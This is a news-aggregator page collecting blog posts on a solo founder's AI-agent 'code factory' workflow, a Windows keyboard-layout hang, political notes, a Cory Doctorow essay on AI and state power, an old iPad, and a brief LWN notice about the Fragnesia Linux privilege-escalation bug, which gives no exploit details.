He shipped something. It didn’t work commercially, so he moved on, but he still learned a lot about iterating on AI products in the process. A few years later, when he had an idea for a divorce tool born out of watching his family members struggle through difficult splits, he was ready to build a real MVP, and he did it all by himself (with a little design help along the way).

As one of the foremost proponents of companies led by a single founder running a team of agents, in some sense, Ryan is a prince from another country. Maybe it’s not immediately apparent how his current workflow is relevant to developers working for big corporations beyond efficiency gains with AI-assisted coding. But thinking bigger picture, what Ryan calls the “code factory”—a system where agents write and review the code, run the tests, triage the error reports, and monitor the production environment, under his oversight—may be an early version of what a lot more organizations will look like in five years.

The loop is the thing

What makes the code factory model possible, Ryan explained, is the ability to set up automations and skills for the jobs you know need to happen every day. In other words, you’re teaching an agent to do a repeatable process. The underlying pattern is the iterative loop, and Ryan was an early proponent and popularizer of Geoffrey Huntley’s “Ralph Wiggum” approach.

The name comes from a Simpsons character who is, to put it charitably, not the sharpest. The idea is that you don’t need the agent to be superintelligent. You need it to do one thing, write down what it did and what it learned, stop, and restart with that notebook in hand. As Ryan pointed out, it turns out that pretty good intelligence, a loop, some instructions, and a notebook gets you surprisingly far into complex territory. Or to use another of Ryan’s analogies:

Think of it as a notebook where it’s like, “Here are the things I’ve done. And here’s the holes I fell into.” It’s like Memento, the movie, where [the main character] tattoos himself or uses notes to remember, like, “What did I do yesterday and what did I learn?” And agents are the same. They don’t have any long-term memory. And so [Geoffrey Huntley] figured out, yeah, this loop actually works shockingly well. It’s very primitive, this idea. And eventually after a number of these iterations, you actually get pretty complex outcomes.

When I heard this I thought of my first exposure to shell programming and how I fell in love with loops. You have a repetitive task and you want to do it many times, and computers are good at that. The language has changed, though; it’s English now instead of Bash. But the logic hasn’t: do something; save the result; do it again.
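The loop described above can be sketched in a few lines. This is a minimal illustration, not Huntley's or Ryan's actual tooling: `run_agent` is a placeholder for whatever agent invocation you use, and the notebook file name is invented.

```python
# A minimal sketch of the "Ralph Wiggum" loop: do something, write down
# what happened, restart with the notebook in hand. The agent call is
# stubbed out; a real version would invoke an LLM with the task plus
# the accumulated notes.
from pathlib import Path

NOTEBOOK = Path("notebook.md")  # illustrative file name


def run_agent(task: str, notes: str) -> str:
    """Placeholder for one agent invocation. The agent has no long-term
    memory; everything it 'remembers' arrives via the notes argument."""
    return f"Attempted: {task} (with {len(notes)} chars of prior notes)"


def ralph_loop(task: str, iterations: int) -> str:
    for i in range(iterations):
        # Fresh start every iteration: the notebook is the only memory.
        notes = NOTEBOOK.read_text() if NOTEBOOK.exists() else ""
        result = run_agent(task, notes)
        NOTEBOOK.write_text(notes + f"\n## Iteration {i}\n{result}\n")
    return NOTEBOOK.read_text()
```

The point of the structure is exactly what Ryan describes: the agent restarts cold each pass, and the notebook of "things I did and holes I fell into" is what accumulates.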

The skill I use to generate first drafts of posts like this reads the transcript, summarizes it, and suggests possible video clips to extract. I built it with a different sort of loop: iteratively training Claude to write more like me by rewriting its drafts, asking it to analyze the differences, and feeding those differences back as a SKILL.md file, repeating until the gap narrowed enough that the drafts reflected my own takeaways with far less editing time.

Ryan brought up an important point: skills decay. A Next.js skill from six months ago may conflict with your current component library. Two skills may say opposite things. He told me he’d gladly pay for a system that audits his skills library, flags conflicts, and surfaces what’s gone stale. Anyone can write a skill that’s useful in the moment. The value is in keeping the skill current and coherent as it interacts with the code factory’s complete workflow.
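A skills auditor like the one Ryan wishes existed could start as simply as this sketch. The heuristics here (an age threshold, flagging two skills that mention the same framework) are my own illustrative assumptions, not a real product's logic.

```python
# A toy audit of a skills library: flag skills that have gone stale and
# pairs of skills that may conflict because they cover the same topic.
# Both heuristics are illustrative placeholders.
import time
from pathlib import Path

STALE_AFTER_DAYS = 180  # assumption: six months without edits is "stale"


def audit_skills(skill_dir: str) -> dict:
    skills = sorted(Path(skill_dir).glob("*/SKILL.md"))
    now = time.time()
    stale = [p.parent.name for p in skills
             if (now - p.stat().st_mtime) > STALE_AFTER_DAYS * 86400]
    # Crude conflict check: two skills mentioning the same framework
    # might be giving the agent contradictory instructions.
    by_topic: dict[str, list[str]] = {}
    for p in skills:
        for topic in ("next.js", "react", "tailwind"):  # illustrative
            if topic in p.read_text().lower():
                by_topic.setdefault(topic, []).append(p.parent.name)
    conflicts = {t: names for t, names in by_topic.items() if len(names) > 1}
    return {"stale": stale, "conflicts": conflicts}
```

A real auditor would need to reason about the *content* of overlapping skills, not just spot shared keywords, which is why this is a paid-product-shaped problem rather than a weekend script.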

The code factory in practice

I asked Ryan to show us his daily workflow to give us a peek into the code factory. He shared a screen with 15 active threads running in Devin (at a monthly token burn of $2,000–$3,000). As Ryan explained, having a tool like Devin is the key to the code factory model. He’d started by “hand-cobbling” together a system with a Ralph Wiggum loop and a skill, but it was fragile and things broke or got out of sync. He needed a more durable system to run the cron jobs and nightly automations that keep the factory humming. He picked Devin, but ultimately choosing a direction was more important than the choice itself:

If you back up and say, How is the modern code factory happening? It’s choosing a tool that allows you to have automations and skills for jobs that you know that you need to be doing every day.

And he’s since expanded that toolset to cover product requirements beyond software engineering, like design.

What you can automate, and what you can’t

One of the threads Ryan had open was an end-to-end smoke test that signs up for his own app every morning, runs through the full onboarding flow, exercises all 14 tools, and records a video of itself doing it. Every morning he wakes up to a report. The test passed or it didn’t, and if it didn’t, here’s what failed. He has a separate Devin automation that reads Sentry every morning, and if it finds something problematic, spins up another Devin to fix it.
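The triage half of that automation is straightforward to sketch. The event shape, field names, and thresholds below are invented for illustration; the real version reads from the Sentry API and hands actionable items to another agent.

```python
# A hedged sketch of morning error triage: scan last night's error
# events and decide which deserve a fix task. The event dictionaries
# and thresholds are illustrative assumptions, not Sentry's schema.
def triage(events: list[dict], min_count: int = 10) -> list[str]:
    """Return the error signatures worth spinning up a fix for."""
    actionable = []
    for e in events:
        if e.get("resolved"):
            continue  # already handled, skip
        # High-volume or user-facing errors get a task; noise is skipped.
        if e["count"] >= min_count or e.get("affects_checkout"):
            actionable.append(e["signature"])
    return actionable


def morning_report(events: list[dict]) -> str:
    todo = triage(events)
    if not todo:
        return "All clear: nothing to fix this morning."
    return "Spin up fixes for: " + ", ".join(todo)
```

The interesting design choice is that the human only sees the output of `morning_report`, not the raw event stream, which is exactly the compression of attention described below.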

This is what a CTO does: reads the Datadog and Sentry reports, triages what matters, and points the team at it. Ryan has automated the reading and the triaging. He still decides what to do about the things that matter, but the number of things he has to pay attention to has been compressed dramatically.

Ryan’s figured out how to automate many of the responsibilities he hired for in his previous companies. Another automation runs against his Google Ads, Meta, and X spend, compiles a performance report on cost per click, lead generation, click-through rate. He reads that the way a head of marketing would read it.

There’s one thing he hasn’t been able to automate: what he should build. As we hear again and again, the efficiency gains in coding, testing, design iteration, and monitoring don’t replace the judgment calls about which problems matter. As Ryan noted, “There isn’t a magic wand still. You can build faster, but whether you’re building the right thing, and doing it better is something [else].”

Programming isn’t going away

We all need to keep pushing back on the narrative that programming is going away. When I started, I wrote assembly language programs. I was literally moving data from registers, multiplying values, low-level operations that nobody does manually anymore because the compiler handles it all. When we look back on that, we don’t think “programmers became unnecessary.” We understand that programming was just abstracted to a higher level, and became more powerful for it. That’s where we are again.

Ryan used the analogy of a carpenter switching from a handsaw to a Sawzall. It saves a ton of time, but you still need to know which pipes you’re cutting or you’re going to have a bad day. The domain knowledge doesn’t get abstracted away with the tool.

The people who are going to do well are the ones who bring genuine domain expertise to what they’re asking agents to do. Ryan knows divorce law well enough to evaluate whether the output is right. He knows enough about software to catch when the agent has gone off the rails. The agent amplifies what you already know; it can’t supply what you don’t.

What happened when he pitched an attorney

Ryan’s company is built for people considering or going through a divorce who find the process too expensive and too hard. But he always expected attorneys to have opinions. As he put it, “Either they would hate us and see us as the grim reaper, or they would love us because we’re going to save them costs.” So he had his AI agent, whom he calls R2, find and book meetings with small family law firms to hear them out. The feedback was very positive (from lawyers at least; paralegals may have another opinion). Here’s how one legal business owner responded to his pitch:

The truth is, I have a lot of overhead from folks that are more in the paralegal space. And it sounds like your tool will do all that work. And I would rather have attorneys on staff that are doing the real legal work and then have all the paralegal work done by AI. I would love to pay you for that.

I expect that’s where most of the near-term displacement happens. Lower-value overhead gets automated and professionals spend more of their hours on actual professional work.

Sometimes there’s an economic tradeoff between job losses (bad for those who lose their jobs) and lower costs that can be passed on to consumers. A lot of people who need legal help with a divorce can’t afford it, so they get stuck in a bad marriage. If the cost of the process comes down because the overhead is lower, some of those people get served who currently aren’t. There’s a big difference in economic impact between a business just saving costs and pocketing the savings and one that passes those savings along to consumers or uses them to radically improve access.

AI’s supporting role

Late in our conversation, someone asked how you use AI to identify strategic opportunities. Ryan’s answer was practical: build a priority map of the projects and people that matter to you, then run a cron job every 15 minutes to triage your inbox and Slack through that map, surface what’s relevant, and act. Ryan calls it his AI chief of staff, and he’s even open-sourced it as Clawchief.
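The core of that priority-map pattern fits in a few lines. The map entries, weights, and threshold here are invented for illustration; Ryan's Clawchief presumably does much more (reading Slack and email on a cron, acting on results).

```python
# A minimal sketch of priority-map triage: score each incoming message
# against the projects and people you care about, and surface only what
# crosses a threshold. Keys and weights are illustrative assumptions.
PRIORITY_MAP = {
    "untangle launch": 5,
    "investor": 4,
    "devin outage": 5,
    "newsletter": 1,
}


def surface(messages: list[str], threshold: int = 4) -> list[str]:
    surfaced = []
    for msg in messages:
        # Score is the weight of the highest-priority topic mentioned.
        score = max((w for k, w in PRIORITY_MAP.items()
                     if k in msg.lower()), default=0)
        if score >= threshold:
            surfaced.append(msg)
    return surfaced
```

Run on a schedule, this is the "query living with the data" idea in miniature: the map sits there waiting, and new messages are matched against it as they arrive.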

My framing is a little different, and it comes from a conversation I had years ago with Jeff Jonas, who has done data work for national intelligence agencies and casino security systems. His dream was a system where the query lives in the same space as the data. Rather than going looking for things, you define what matters to you and the system watches for it. New data shows up and the query is already there, waiting. Jeff was talking about that long before agents were a concept, but it describes what a well-designed agent loop can do now.

Only you yourself will be able to fully understand the strategic opportunity moments for your company. What AI can do for you is be a scout. It can surface things that you should be paying better attention to. That’s what Jeff and Ryan are both talking about (Steve Yegge too): an agent that watches the flow and surfaces what deserves your attention rather than one that tries to make decisions for you.

Right now, there’s this incredible opportunity to try things out and see what sticks. As Ryan has shown, it doesn’t take an entire company. Identify your goal and opportunity, then start building. His advice: Don’t worry about trying out every new tool. Just “find an energetic system,” then “pick a lane and invest.”

18:28

The case of the hang when the user changed keyboard layouts [The Old New Thing]

A customer reported that their program hung when the user changed keyboard layouts, say by using the Win+Space hotkey sequence. They debugged it as far as observing that the foreground window in their application received a WM_INPUTLANGCHANGEREQUEST message, and when that message was passed to DefWindowProc, the call never returned. What’s so haunted about the WM_INPUTLANGCHANGEREQUEST message?

What’s so haunted about it is that the default behavior of the WM_INPUTLANGCHANGEREQUEST message is to change the input language!

For historical (and therefore now compatibility) reasons, when a hotkey-initiated input language change request is accepted, the system applies the change to all threads of that process. This means that all UI threads of the process need to be pumping messages so that they can receive the notification that their keyboard state has changed.

In this case, the customer had a background thread that created a window but was not pumping messages. That prevented the language change from completing and caused the main UI thread to hang.

The customer wanted to know if there was a way to configure their program so that hotkey-initiated input language changes don’t require all threads to be pumping messages. But that’s trying to solve too narrow a problem. If your thread has created a window, then it must pump messages. Today it’s causing trouble with input language changes. Tomorrow, it’s going to cause problems with DDE, and the day after tomorrow, it’s going to cause problems with theme changes.

Even if you had a way to change the way language changes work, that’s just one of the problems that your non-responding thread is causing. You should fix the root cause: Either pump messages or destroy the window so that it is no longer a UI thread and is no longer obligated to pump messages.

The post The case of the hang when the user changed keyboard layouts appeared first on The Old New Thing.

18:21

Israel's violation of the "cease fire" in Gaza [Richard Stallman's Political Notes]

Israel agreed to a "cease fire" in Gaza, but violates it in several ways. In fact, it is only a reduction in the frequency of atrocities.

Resisting construction of datacenters [Richard Stallman's Political Notes]

Resisting the construction of datacenters for pretend intelligence is not mere nimbyism. They are the only aspect of pretend intelligence that people have a chance to oppose.

*In the words of the antitrust expert Zephyr Teachout: "If you want democratic governance of AI [sic], block datacenters. Google's not coming to any democratic table, not listening to any rules, without people showing force."*

I see one other point where we can resist — by refusing to call it "intelligence".

Critically low snowpack [Richard Stallman's Political Notes]

*Data from missions showing critically low snowpack on mountains across the west raises alarm among experts.*

This problem of global heating was predicted many years ago. We could have prevented some of the dryness if we had made a global effort.

Barring cops from involvement in extremist groups [Richard Stallman's Political Notes]

*Chicago Ordinance Would Bar Cops from Active Involvement in Extremist Groups.*

Every state should enact such a law, and so should the federal government, if we ever pry it loose from violent extremists.

Demands for higher taxes on billionaires [Richard Stallman's Political Notes]

*Pity the poor billionaires – demands for higher taxes must feel hurtful.*

And biased! Don't forget the unfairness of increasing the tax rate only for the super-rich ;-!

17:35

[$] Friction in Fedora over AI developer desktop initiative [LWN.net]

A push by Red Hat employees to create a Fedora "AI Developer Desktop" with support for out-of-tree kernel drivers and AI toolkits has been met with objections from some long-time members of the Fedora community. After more than a month of sometimes heated discussion, the Fedora Council voted to approve the initiative; however, a last-minute switch to a vote against the proposal by council member Justin Wheeler has (at least temporarily) sent it back to the drawing board.

17:28

Pluralistic: Billionaire solipsism, dictator solipsism, AI, and the fascist paradigm (13 May 2026) [Pluralistic: Daily links from Cory Doctorow]


Today's links



An aerial image of the planned city of Levittown, tinted light green. A circuit board bleeds through the open spaces on the town plan. Hovering over the town are Trump's disembodied, bloodshot eyes, in pouchy orange nests. Orange tentacles swarm over the town.

Billionaire solipsism, dictator solipsism, AI, and the fascist paradigm (permalink)

With great power comes great solipsism: the more power you wield over other people, the less real they become to you. To rule is to see people as aggregates, statistical artifacts, as a means to an end. It's how people seem when you're at the bottom of a k-hole.

Per Granny Weatherwax, this is the root of all evil: "Sin is when you treat people like things":

https://brer-powerofbabel.blogspot.com/2009/02/granny-weatherwax-on-sin-favorite.html

The problem (for powerful people) is that other people aren't things; they're people, with stubborn attachments to their own priorities and needs. This is a huge problem for social media bosses, since the force that keeps you stuck to their platforms is your love of your friends, which sucks (for social media bosses), because your friends refuse to organize their interactions with you to "maximize engagement." There is a group of platform users who are dedicated to maximizing your engagement: performers (which is why legacy social media platforms have reduced the quantum of your feed given over to your friends to a bare minimum and swapped in the amateur dramatics of theater kids). But even "influencers" demand treatment as people, not things (which is why legacy social media is squeezing out performers in favor of slop):

https://pluralistic.net/2026/04/17/for-youze/#forever

Running a social media service is especially solipsism-inducing, since the back-end of a social media service always reduces people to statistical artifacts to be steered, thwarted, or rewarded based on the degree to which they are "maximizing engagement." No wonder zuckermuskian social media bosses mythologize themselves as dopamine-hacking wizards who've built a mind-control ray. Skinnerism and solipsism fit together very neatly, seducing you into the belief that everyone else is a stimulus-responding automaton, programmed to think they have free will:

https://pluralistic.net/2025/05/07/rah-rah-rasputin/#credulous-dolts

(Of course, the AI boss version of this is the belief that everyone else is a "stochastic parrot":)

https://xcancel.com/sama/status/1599471830255177728

But in truth, any corporate boss is prone to solipsism. To maximize corporate profits, you must view other people – employees, suppliers and customers – as inconvenient problems to be solved, not true people with feelings and needs that are co-equal with your own.

This is why AI is so attractive to the ruling class. For corporate leaders, the fantasy of your own worth is always dangerously close to collapsing, due to the haunting knowledge that if you don't show up for work, everything continues as per normal; while if your workers don't show up for work, the shop closes down and stays closed. Bosses really want to be in the driver's seat, but ultimately they know that they're strapped into the back seat, playing with a Fisher Price steering wheel. AI is a way to wire that toy steering wheel directly into the drive-train: it's the fantasy that a boss can have an idea and the corporation will execute it, without any messy human needs or demands getting in the way:

https://pluralistic.net/2026/01/05/fisher-price-steering-wheel/#billionaire-solipsism

Solipsism is why bosses fetishize IP and ignore process knowledge. IP is the part of the job that the worker can explain (and that you can train an AI model on). Process knowledge is the part of the job that can't be abstracted, alienated or commodified. The very existence of process knowledge is the major impediment to de-skilling workers so they can be interchanged with other, more desperate, more timid workers (or with sycophantic AI):

https://pluralistic.net/2025/09/08/process-knowledge/#dance-monkey-dance

Of course, there's a whole group of powerful people outside of the corporate world who are gripped by solipsistic AI fantasies: politicians. Like social media bosses, politicians deal with people as statistical artifacts who respond to policy inputs with semi-predictable outputs:

https://en.wikipedia.org/wiki/Seeing_Like_a_State

And of course, politicians have their own detested class of workers whom they fantasize about replacing with chatbots: bureaucracies. When Trump et al bemoan the "deep state," they are engaged in the politicians' version of the corporate boss's solipsism: "I make policies, but to enact them, I have to convince civil servants to turn my agenda into action. This sucks. Can't we just have an all-powerful executive who decides on things and then those things just happen?"

Writing for Columbia's Knight First Amendment Institute, political scientist Henry Farrell and statistician Cosma Rohilla Shalizi have produced the definitive account of how AI psychosis has infected our political classes:

https://knightcolumbia.org/content/ai-as-social-technology

Farrell and Shalizi use this political AI psychosis to explain DOGE, framing DOGE as a project where politicians and their loyal vassals cut a deep wound in the administrative state on the basis that general AI was about to emerge. With godlike AI around the corner, these bureaucrats – who insist on having opinions based on long experience and ethical sensibilities – could be replaced with sycophantic chatbots who'd turn the will of the unitary executive into policy without any filtration through unreliable, squishy humans.

This is a political version of my maxim that "the fact that an AI can't do your job doesn't stop an AI salesman from convincing your boss to fire you and replace you with an AI that can't do your job." Private sector bosses are easy marks for AI salesmen, and not just because they want to reduce their wage bills, but also because it will fulfill the solipsist's fantasy of a corporation that turns the singular genius of the boss into a product without any messy demands from workers (and, if you're Zuckerberg and convinced that you've created a mind-control ray, your product can be rolled out without any messy demands from your customers, either, since you've hypnotized them into doing as they're told).

The public sector version of this is the fantasy that you can eliminate the civil service and use an army of chatbots to do the job – not merely as a way of slashing the federal budget, but also as a way of purifying the transfer of the leader's will to the people without any intervening loss of fidelity resulting from the need to have your policies interpreted (and willfully misinterpreted) by bureaucrats.

This is a very important framing, and it explains why fascists like Trump and dead-eyed technocrats like Canadian Prime Minister Mark Carney are hell-bent on gutting their countries' civil service and replacing it with chatbots:

https://policyoptions.irpp.org/2026/04/carney-ai-government-risks/

This is how Muskism and DOGE connect to Trumpism and AI: Musk doesn't believe other people are real. He calls them "NPCs" (non-player characters). He wants to put a microchip in your head so he can "replace your bad programming":

https://pluralistic.net/2026/04/21/torment-nexusism/#marching-to-pretoria

It's the fascist paradigm: the idea that people are incapable of self-rule, save for a very small number of singular geniuses who should be put in a position of absolute authority over all of us, to keep us safe from our own foolish impulses:

https://pluralistic.net/2026/05/12/donella-meadows/#paradigmatic

The Technocrats – a protofascist movement that once captured the imagination of Musk's grandfather, and whose ideas are now frequently quoted and alluded to by the likes of Marc Andreessen – were addicted to the quantitative fallacy that infects economics and other disciplines. That's the idea that every social process can be expressed as a mathematical model, which can then be optimized.

The problem, of course, is that much of the real world is qualitative, and the act of quantizing those qualia is a very lossy process. To quantize a qualitative question is to incinerate all the qualitative aspects and then do mathematics on the dubious quantitative ash that is left behind:

https://locusmag.com/feature/cory-doctorow-qualia/

In their paper, Farrell and Shalizi cite Ben Recht's maxim that "you can’t optimize a trade-off":

https://www.argmin.net/p/are-there-always-trade-offs

But of course, we optimize trade-offs all the time. That's what being a boss means, and it's also at the very core of self-determination: the right to decide what trade-offs you want to make. What Recht means is "you can't optimize a trade-off for everyone else." Those stubborn not-quite-people – customers, workers, bureaucrats – insist that they want different trade-offs.

In translating the will of a supreme leader to policy without any intervening need for buy-in by humans, fascist projects like DOGE seek to optimize trade-offs according to the preferences of the supreme leader. AI in government is grounded in the idea that a sufficiently deserving leader can be trusted to vibe-code the entire apparatus of state, checked only by his own sense of rightness:

https://thehill.com/policy/international/5680714-trump-morality-international-law/

Farrell and Shalizi forcefully make the point that statecraft is not a set of discrete problems with provably correct answers that must be solved. Government is a matter of making choices between mutually exclusive policies that have benefits and costs, and those costs and benefits fall upon different groups differently.

The idea that you can simply feed every fact about a society into a chatbot and order it to "solve" the nation reveals a profound ignorance about the nature of political contests. There's no empirical way of deciding whose priorities deserve to be realized and who must be disappointed. There isn't even an empirical way to compare the benefits that one group receives to the costs another group pays.

What's more, any system that uses LLMs to make high-stakes tradeoffs between different societal priorities will be relentlessly targeted by the groups that stand to win or lose based on those decisions, and by bureaucrats whose careers depend on making the number go up. They will poison the LLMs' training data, and figure out how to trick them into deceiving their bosses about the situation on the ground.

Back in 2018, Yuval Harari predicted that AI would supercharge dictatorships by overcoming "authoritarian blindness" – when the suppression of political opinion is so effective that the first sign that a dictator has of his waning support is a mob that burns the presidential palace down. This prediction failed, because people who live under dictators have switched all the energy they used to use to put on a good show for the secret police into putting a good show on for the chatbots:

https://pluralistic.net/2023/07/26/dictators-dilemma/#garbage-in-garbage-out-garbage-back-in

Meanwhile, the "variability" introduced by bureaucrats who adapt political policies is a feature, not a bug. When a long-tenured public official receives a directive from on-high that they know will be a disaster if implemented unchanged, they can tweak the policy so that it is at least partially successful.

Fire that bureaucrat and hand the policy to a rigidly loyal LLM that will not deviate from its strict instructions and you will end up with nothing (rather than a perfect policy implementation). Indeed, you may end up with less than nothing, as resentful local populations sabotage your agenda.

Both Hayek and Marx agreed that people at the very periphery of the system have insights into local conditions that no boss/central planner can know (though they disagreed about what that fact implied). An LLM is the ultimate micro-manager, and government by Computer Says No would only work if the person writing the system prompt knew everything about everyone everywhere.

As Farrell and Shalizi write,

The frustrations of actually existing bureaucracy do not merely arise from inept or technically-inadequate solutions to the principal-agent problem. They emerge too from the collision of multiple incommensurable demands, each with its own problems and benefits, so that there are no optimal design solutions. Those who build or reform bureaucracies, like those who build other artifacts, need to satisfice across multiple intersecting needs and pathologies. Designs that neatly address one kind of problem may radically worsen others. Actually-existing AI has its own imperfections, some of which are endemic. Grafting AI systems onto existing bureaucracies will solve some problems but will worsen others and make altogether new ones. It will not eliminate the political difficulties of mediating across different, often non-commensurable, goals. Imagining replacing bureaucracy wholesale with AI is only plausible if one waves away the actual difficulties associated with real social technologies.


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago Woz's programmable remotes https://web.archive.org/web/20010603184833/http://www.celadon.com/Industrial/PIC200/pic200oem.html

#25yrsago Furbeowulf http://www.trygve.com/furbeowulf.html

#20yrsago Diebold voting machines can be 0wned in minutes https://blog.citp.princeton.edu/2006/05/11/report-claims-very-serious-diebold-voting-machine-flaws/

#20yrsago British farmer supplies gallows to totalitarian governments http://news.bbc.co.uk/2/hi/uk_news/england/suffolk/4754515.stm

#20yrsago Proposed law requires schools to censor MySpace, LJ, blogs, Flickr https://web.archive.org/web/20060521054806/http://www.pbs.org/teachersource/learning.now/2006/05/new_federal_legislation_would_1.html

#15yrsago Vernor Vinge on the promise, progress and threats of Augmented Reality https://www.ugotrade.com/2011/05/10/interview-with-vernor-vinge-smart-phones-and-the-empowering-aspects-of-social-networks-augmented-reality-are-still-massively-underhyped/

#15yrsago American oligarch buys the right to hire professors at Florida State U https://web.archive.org/web/20110511210435/https://www.tampabay.com/news/business/billionaires-role-in-hiring-decisions-at-florida-state-university-raises/1168680/

#15yrsago National Jukebox: public domain music archive from the Library of Congress https://www.loc.gov/collections/national-jukebox/about-this-collection/

#15yrsago America’s net censorship bill is back and worse than ever https://arstechnica.com/tech-policy/2011/05/revised-net-censorship-bill-requires-search-engines-to-block-sites-too/

#10yrsago DNC Host Committee composed of GOP megadonors, Net Neutrality haters, fracking boosters and anti-Obamacare lobbyists https://web.archive.org/web/20160511160814/https://theintercept.com/2016/05/11/lobbyists-dnc-2016-convention/

#10yrsago Minnesota lawmakers propose bizarre, dangerous PRINCE law https://www.eff.org/deeplinks/2016/05/minnesota-legislators-go-crazy-pushing-dangerous-prince-act

#10yrsago NZ Prime Minister John Key ejected from Parliament over Panama Papers rant https://www.nzherald.co.nz/nz/prime-minister-john-key-thrown-out-of-debating-chamber-by-speaker/A5LQPMGB56QXTGE2ZFIK2MSRPE/?c_id=1&amp;objectid=11637448

#10yrsago Putting two elevators in one shaft https://web.archive.org/web/20160512013856/https://www.wired.com/2016/05/thyssenkrup-twin-elevator/

#10yrsago Germany will end copyright liability for open wifi operators https://torrentfreak.com/germany-to-rescind-piracy-liability-for-open-wifi-operators-160511/

#10yrsago Save Firefox: The W3C’s plan for worldwide DRM would have killed Mozilla before it could start https://www.eff.org/deeplinks/2016/04/save-firefox

#5yrsago Let's eat all the cicadas https://pluralistic.net/2021/05/11/uniboob/#eat-the-brood

#5yrsago Cyclopedia Exotica https://pluralistic.net/2021/05/11/uniboob/#one-eye-and-three-dot-dot-dot


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers.

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)

  • "Enshittification: Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), FirstSecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse-Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.

  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

16:56

Jonathan Dowland: iPad Mini (2013) [Planet Debian]

In or around 2014 I bought an iPad Mini (2), and following the normal lifecycle of iOS devices, a major OS update eventually killed it as a useful, general-purpose device: operating it was just too sluggish. It remained useful as a streaming media player for a little while longer until eventually the big streamers (BBC iPlayer, Netflix, etc.) stopped supporting the version of their app which the iPad could install: the last officially supported iOS was 12.4.8 in July 2020, and by November it was officially dead.

Old 32bit games

During its useful life, the iPad Mini witnessed Apple's transition from 32 to 64 bit apps. In the 32 bit days, there was a little cottage industry of app developers, and in particular, game developers. There were even several independent websites (App Shopper, Pod Gamer, Free-App Hero), which aided in sorting through the morass of apps to find the good ones (then as now, the App Store itself was almost impossible to effectively browse). This all went away during the 32/64 transition, as many small-scale developers weren't actively developing their applications or games any more, and weren't prepared to spend the time or pay the Apple tax to rebuild and publish them as 64 bit.

The last version of iOS that supported 32 bit apps on this device was 10.3.3, and by luck, there are some methods available to install this old version of iOS on the Mini 2 today. A couple of years ago I did so, but I kept no notes, so sadly I can't report on which method I used. But it worked, and I was able to install a bunch of old 32 bit games that I had no access to on more modern devices.

Prior to John Carmack's1 departure from id Software, he'd been responsible for publishing several experimental id Software games on iOS. These mostly disappeared in the 64 bit transition. Amongst them are ports of Wolfenstein 3D, classic Doom, and some RAGE tie-ins, but perhaps most interestingly, at least two original games designed for the phone form factor: Doom II RPG and Wolfenstein RPG.

Reading magazine-style things

Another notable game that disappeared was "Civilisation Revolution", a cut-down Civ game that for a while I was obsessed with. Rather than port it to 64 bit, the publisher withdrew it, and then published a "new" game "Civilisation Revolution 2", requiring a separate purchase. Sadly, it is rubbish, nowhere near as good as the first one.

Anyway, having managed to downgrade it to the 32 bit iOS and install these old lost games, I then, of course, never played them, and the device continued to gather dust. I should make clear that running such an old, unpatched iOS version means it's not safe at all to put any kind of sensitive information on it, including entering passwords. I don't recommend even opening the web browser. However, this 12 year old device does have some use as an e-reader, especially for certain types of ebook or magazine that I've struggled to engage with on other devices. That's a topic for another blog post.


  1. Carmack reportedly also had a pivotal role in convincing Steve Jobs to permit native apps and provide an App Store on iOS: the plan had been to solely support web apps, at least for 3rd parties.

16:49

Yet another Dirty Frag type vulnerability: Fragnesia [LWN.net]

Sam James has sent an announcement to the OSS Security mailing list about another local-privilege-escalation (LPE) exploit in the same class as Dirty Frag, called "Fragnesia". From the disclosure:

This is a separate bug in the ESP/XFRM from dirtyfrag which has received its own patch. However, it is in the same surface and the mitigation is the same as for dirtyfrag.

It abuses a logic bug in the Linux XFRM ESP-in-TCP subsystem to achieve arbitrary byte writes into the kernel page cache of read-only files, without requiring any race condition.

James noted that there is a patch in the works, but it has not yet been pulled into Linus Torvalds's tree nor into any of the stable kernels. A proof of concept exploit is also available.

15:42

Link [Scripting News]

